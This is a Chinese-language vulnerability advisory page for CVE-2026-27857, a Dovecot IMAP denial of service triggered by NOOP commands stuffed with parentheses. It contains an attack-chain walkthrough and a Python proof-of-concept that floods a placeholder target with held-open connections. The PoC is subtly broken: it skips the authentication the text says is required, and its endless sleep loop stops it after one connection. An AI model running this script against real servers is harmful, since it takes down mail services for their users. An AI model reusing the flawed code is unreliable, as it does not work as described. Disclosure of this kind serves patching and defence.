CVE-2026-27857 CVSS 4.3 中危

CVE-2026-27857 Dovecot内存耗尽拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27857

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dovecot

漏洞概述

该漏洞允许攻击者通过发送特制的NOOP命令导致Dovecot内存耗尽。攻击者发送包含约4000个括号的命令可占用1MB内存，若不发送结束符，内存将长时间被占用。通过建立大量此类连接，攻击者可耗尽服务器内存，触发进程VSZ限制，导致服务崩溃。

技术细节

漏洞原理在于Dovecot处理IMAP NOOP命令时的内存分配机制。当发送包含大量括号（如4000个）的NOOP命令时，服务端会分配额外内存（约1MB）。若攻击者刻意不发送命令结束符（LF），该内存块将不会被释放。攻击者利用低权限账号，从单一IP发起大量连接并保持该状态，可迅速累积消耗巨大内存（如1GB），最终导致操作系统因VSZ（虚拟内存大小）限制而强制终止Dovecot进程，造成拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者连接到目标Dovecot服务器的IMAP端口（通常为143）。

STEP 2

步骤2

使用低权限账号进行身份验证（CVSS PR:L）。

STEP 3

步骤3

发送特制的NOOP命令，包含约4000个括号，且不发送结束符LF。

STEP 4

步骤4

保持连接开启，使服务器持续占用约1MB内存。

STEP 5

步骤5

重复建立大量连接（如1000个），耗尽服务器VSZ内存限制，导致进程崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

TARGET_HOST = 'TARGET_IP'
TARGET_PORT = 143
CONNECTIONS = 1000

def create_dos_connection():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        s.recv(1024)  # Receive banner
        
        # Craft payload: NOOP with 4000 parentheses
        # Omitting line feed (LF) to keep memory allocated
        payload = "NOOP " + ("(" * 4000 + ")" * 4000)
        s.send(payload.encode())
        
        # Hold connection open
        while True:
            time.sleep(100)
    except Exception as e:
        print(e)

for _ in range(CONNECTIONS):
    create_dos_connection()

影响范围

Dovecot (具体受影响版本请参考官方公告 oxdc-adv-2026-0001)

防御指南

临时缓解措施

目前除了升级到修复版本外，没有其他已知的缓解措施。请尽快安装厂商提供的补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表